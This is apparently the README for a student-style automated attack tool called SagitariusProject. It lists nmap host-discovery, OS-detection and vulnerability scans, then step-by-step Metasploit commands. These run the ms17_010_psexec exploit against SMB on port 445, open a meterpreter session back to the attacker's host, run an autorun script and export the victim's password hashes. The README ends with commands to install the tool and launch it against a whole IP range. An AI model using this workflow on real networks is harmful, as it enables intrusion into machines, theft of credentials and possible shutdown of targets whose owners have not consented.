Welcome to the SagitariusProject README.    
    
In this file we will detail all the command lines that are used in this project.    
Then I will explain how to install and run the main script    
    
Scanning command lines :     
    
#Scan to detect all UP hosts on the network :    
```bash
nmap -sP <IP range>
```    
	| nmap -sP 172.20.10.0/n    
    
#Scan to detect OS informations on a specific host :    
```bash
nmap -O <specific host>
```    
	| nmap -O 172.20.10.n    
	(n is the number representing the specific host)    
     
#Scan to detect vulnerabilities on a specific host :     
```bash
nmap -v --script vuln <specific host>
```     
	| nmap -v --script vuln 172.20.10.n     
	(n is the number representing the specific host)    
    
The results of those command line will be registered as log files.    
    
Exploit commands    
    
#Enter Metasploit console :    
```bash
msfconsole
```        
    
#Select the good module :    
```bash
use path/to/module
```    
	| use exploit/Windows/smb/ms17_010_psexec    
    
#Declare attackant's adresse and port    
```bash
LHOST <IP ADRESSE>
LPORT <PORT>
```     
	| LHOST 172.20.10.n    
	| LPORT 4444    
    
#Declare target's adresse and port    
```bash
RHOST <IP ADRESSE>
RPORT <PORT>
```    
	| RHOST 172.20.10.n    
	| RPORT 445    
    
#Start exploit    
```bash
exploit
```
    
#Run autorun-console-command script    
```bash
run path/to/script
```    
	| run path/to/sagitarius/scripts/ms17_010_meterpreter_command_autorun.rc    
    
WARNING: The solution may shutdown the target    
    
#Export password dump    
```bash
db_export -f pwdump -a path/to/sagitarius/downloaded_files/<Victim id>_password_hashes.msf
```     
    
#Exit Metasploit    
```bash
exit
```    
    
That's all for the details of each commands used in this solution.    
Now, let's see how to install that solution.    
    
Once you have cloned the BitBucket repository got to the solution's location.    
    
Tap the next command to launch the installation script :    
    
```bash
./install.sh
```    
    
Once the solution is installed run this command to start the solution :    
```bash
sagitarius -i <IP RANGE> -e <EXPLOIT>
```    
	| `sagitarius -i 172.20.10.0\n -e ms17-010`    
    
If you can't execute the solution or even the install.sh script run these commands :    
```bash
chmod +x install.sh
chmod +x ./script/*.sh
```     
     
Now that you have everything working, have fun !     
